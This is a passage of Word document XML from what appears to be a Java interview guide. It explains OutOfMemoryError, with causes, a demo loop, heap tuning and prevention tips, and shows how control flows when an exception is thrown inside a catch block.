          <w:p w14:paraId="25DB5D02"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8BDBC8"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C7A57" w:rsidRPr="00CE4B95" w14:paraId="1447D564" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70237FB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roduced in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CE83BB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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="0F67ECFD" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D2251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equirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E67D7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loseable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="3C719F5D" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20FB6693"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es resources automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679AE5E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9C7A57" w:rsidRPr="00CE4B95" w14:paraId="264A6944" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DFB763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need for finally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F32E7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03EDD5D8" w14:textId="520F544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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D92FA" w14:textId="77777777" w:rsidR="00B81EA8" w:rsidRPr="00CE4B95" w:rsidRDefault="00B81EA8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_Toc197867434"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you come across the OutOfMemory exception? How will you handle it? Explain with standalone code?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="19D5F271" w14:textId="4D9F7E3A" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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The OutOfMemoryError is a common </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java when your application tries to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more memory than the JVM has allocated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., heap, metaspace, stack, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2AACC"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00497">
          <v:rect id="_x0000_i1652" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1F347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utOfMemoryError?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CA9B4"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subclass of Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not Exception, meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E770427"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ndicates a serious issue the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>should not try to catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E73AFC"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typically means the JVM is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out of heap or other memory spaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCEC8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DCCA95">
          <v:rect id="_x0000_i1653" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE58FB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Causes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6AC4D"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large objects (e.g., huge arrays or collections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD03DA"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 (unreleased objects held by references)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19A207"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bounded caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569CC98"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o many threads (stack space exhaustion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DACC59"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aspace (loading too many classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE1FBE"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5472AB">
          <v:rect id="_x0000_i1654" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74725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iggering OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04538E4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48550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96350CE" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521FCE38"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29371CF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5E719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memoryEater = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C397D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4A3003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emoryEater.add(new int[1_000_000]); // Allocate ~4MB each time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D203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ABC9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8102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C3E2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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eventually throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C88E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in thread "main" java.lang.OutOfMemoryError: Java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104DB7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C00156">
          <v:rect id="_x0000_i1655" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263B434"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or Mitigate It?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604F82C"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atch It (Not Recommended for Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B17C2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EF60CD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list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5058427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4F9BFD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new int[1_000_000]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C409BC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5F0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OutOfMemoryError e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0351B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rr.println("OutOfMemoryError caught: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63A8B6"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g or send alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C1AE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B18A2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is useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>graceful shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or logging but not to continue normal execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260ED4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FF36C">
          <v:rect id="_x0000_i1656" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1E81B"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Tuning to Prevent It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58621E8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tune the heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using VM options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739651A"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s128m -Xmx256m OOMExample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8644B"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s: Initial heap size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C86E3"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x: Maximum heap size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF6CD6"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A2C08">
          <v:rect id="_x0000_i1657" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF145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to Avoid OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB9209"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per data structures (avoid large lists/arrays without bounds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E53F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WeakReferenc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oftReference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F7E56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memory with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conso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AT (Memory Analyzer Tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F285C84"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retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71DAFE"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 up unused references and close resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB0E1A"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ry-with-resources for stream/DB objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088CE65"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E818C7">
          <v:rect id="_x0000_i1658" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62AF1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4193"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="6366A47F" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E3DA40"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4738A6DF"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AA6853" w:rsidRPr="00CE4B95" w14:paraId="2B6D66A2" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C1787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6036A5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not Exception)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="1C80B591" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F07100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6CFF62D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exhaustion (Heap, Metaspace, Stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="5F394622" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C24A2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overy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A28E4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 — usually need to restart or prevent it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="3F12566E" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3344685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ing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62645B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sible, but not preferred</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="30257B2C" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8A8AA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ion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F640E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tuning + memory-efficient code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0204970B" w14:textId="6714BC94"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59" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE7AEB" w14:textId="77777777" w:rsidR="00495831" w:rsidRPr="00CE4B95" w:rsidRDefault="00495831">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc197867435"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have try, catch and finally block and if I have written another exception inside catch block so how control will flow?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="3A753F9F" w14:textId="0D9591F1" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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trol Flow Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1695D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rite a try-catch-finally block, the control flow depends on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F6C90"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y Block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Code inside the try block is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374BC23"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If an exception occurs in the try block, the control moves to the appropriate catch block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00624CCE"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fter the catch block (or after the try block if no exception occurs), the finally block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xml:space="preserve"> (unless the JVM is forced to shut down).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5629364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if you throw another exception </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inside the catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it behaves as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06133708"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original exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is caught and handled in the catch block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32E07C"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 new exception is thrown inside the catch, it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not be handled by the same catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and the new exception will propagate further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDABFD2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> block will still execute regardless of whether the new exception is thrown in the catch block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDE621"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F7D25B">
          <v:rect id="_x0000_i1660" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72702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A45853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ceptionFlowExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814BB9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6E630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BDAF4F0"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49F387E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ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB1BEB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23EDB6B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ArithmeticException");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718659B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A2CFB9A"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exception inside the catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD2447"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NullPointerException("Inside catch block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05258F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ullPointerException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08E8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NullPointerException inside catch block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D627CE"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7C1CEB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012359BC"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executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44363752"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51D3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E4615"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836693"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502F22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0D110A2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ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF4C5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NullPointerException inside catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E16F9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executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D82CB9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ow Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC97AF6"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ry block throws an ArithmeticException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EF9B1"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 catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> catches the ArithmeticException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E02B3"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his catch, a new exception (NullPointerException) is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA4932"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catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> catches the NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6D788"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handling both exceptions, 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executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75176A79"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DF01C">
          <v:rect id="_x0000_i1661" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C9DA5"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621875D1"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xml:space="preserve"> Handles the first exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CB993"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exception in catch:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If another exception is thrown inside the catch, it will be handled by an inner catch or propagate further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691836C2"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lways executes, even if a new exception occurs in catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149DFCC" w14:textId="0008E02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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C07CC" w14:textId="77777777" w:rsidR="00103413" w:rsidRPr="00CE4B95" w:rsidRDefault="00103413">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
